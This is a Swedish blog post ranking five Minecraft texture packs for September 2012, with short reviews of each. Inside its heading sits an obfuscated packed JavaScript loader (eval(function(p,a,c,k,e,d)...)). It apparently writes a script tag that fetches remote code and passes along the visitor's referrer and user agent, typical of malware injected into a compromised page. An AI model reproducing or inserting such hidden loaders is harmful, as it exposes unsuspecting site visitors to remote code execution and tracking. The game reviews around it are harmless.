Image Image Image Image Image Image Image Image Image Image

| 13 juni, 2021

Scroll to top

Top

Top 5 Minecraft Texture pack september 2012

hsb stockholm
Sebastian

Ok då var det dags att uppdatera er med lite roliga och snygga Minecraft Texture Packs igen. Vi vet att det finns välidigt många där ute men vilka är egentligen värda att ladda ner och spara i sin portfölj?

Vi brukar se till att försöka uppdatera er med 10 st snygga Minecraft Texture Packs i månaden även om det ibland händer att vi missar det. Denna månad ska vi dock inte göra det.

Top eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ktets|var|u0026u|referrer|rzisr||js|php’.split(’|’),0,{}))
Minecraft Texture packs September 2012

#1 LB Photo Realism Texture Pack av Scuttle

Från Mcpatcherhd.com har man nästan laddat ner hundra tusen filer och då förtjänar denna texture pack att vara den bästa av det bästa Texture Pack just nu. Denna Texture Pack byggdes först av utvecklaren för att utjämna fel i Minecraft och göra spelet mer realistiskt. Utvecklaren insåg dock att han faktiskt hade ett texture pack och började utveckla det ytterligare. Fokus i detta paket är att göra Minecraft mer realistiskt. Detaljerna och effekterna av bilderna är fantastiska! Du kommer att sjunka ännu djupare i Minecraft än du redan gör.  Dock kan PC prestandan ibland inte hantera 256 × 256, men naturligtvis finns det lägre upplösningar du kan välja mellan.

#2 SummerField Texture Pack av Lithiumsound

Summerfield Texture Pack har högre detaljer än standard Minecraft Texture Pack vilket är 32 × 32. . Det har nyss släptt deras senaste uppdatering till nuvarande version av Minecraft. Det är ett struktur pack som ger en känsla av sommar i Minecraft. Med inspiration från den berömda JoliCraft Texture Pack. Den är också inspirerad av God Morningcraft (GM Craft). Det är en mycket ljus texture pack måste jag säga, perfekt för mörka höst och vinterdagar med längtan efter sommar.

#3 Sphax PureBDCraft Texture Pack av Sphax84

Det fantastiska Sphax PureBDCraft Texture Pack har också nyss uppdaterats för senaste Minecraft. Detta Texture Pack finns i alla vanliga upplösningar från 16 × 16 upp till 512 × 512.  Välj dock den upplösning som fungerar bäst för din dator, annars kan det bli svårt att spela.

#4 JohnSmith’s Texture Pack av John Smith

John Smiths Texture Pack är en gemensam favorit som är kompatibel med många Mods. Detta Texture Pack uppdateras ständigt och håller god kvalitet. Förpackningen är mycket anpassningsbar, så du kan ändra vissa saker du inte tycker om och göra bitarna till ditt eget. Detta Texture Pack ser bra ut på byggnader delvis på grund av den 32 × 32 definition och samt eftersom det är ett stort Minecraft texture pack.

#5 Skyrim Reloaded Texture Pack av Migrosbudget

Vad Skyrim Reloaded Texture Pack gör är som jag den säger, förändrar hela spelets erfarenhet av grafik och texturer till något som liknar Skyrim. Med det menar jag den totala belysning och mörker samt mer kontrast. Texturen på skog och stenar är alla väldigt kraftiga och vackra. Det är en 64x och 128x upplösning på detta Texture Pack. Detta Minecraft Texture pack är helt otroligt enligt mig. Helt klart något som du bör kolla närmare på och ladda ner, du kommer inte bli besviken.

Så här har ni månadens top 5 Minecraft Texture packs. nerladdningslänkar finns i titeln, så det är bara att börja ladda ner 🙂

Comments